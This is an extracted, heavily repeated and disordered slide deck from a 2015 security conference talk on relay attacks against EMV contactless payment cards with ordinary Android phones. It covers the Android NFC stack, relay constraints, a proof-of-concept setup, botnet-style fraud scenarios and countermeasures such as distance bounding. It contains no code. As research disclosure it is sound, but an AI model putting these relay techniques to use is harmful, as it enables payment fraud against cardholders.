J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
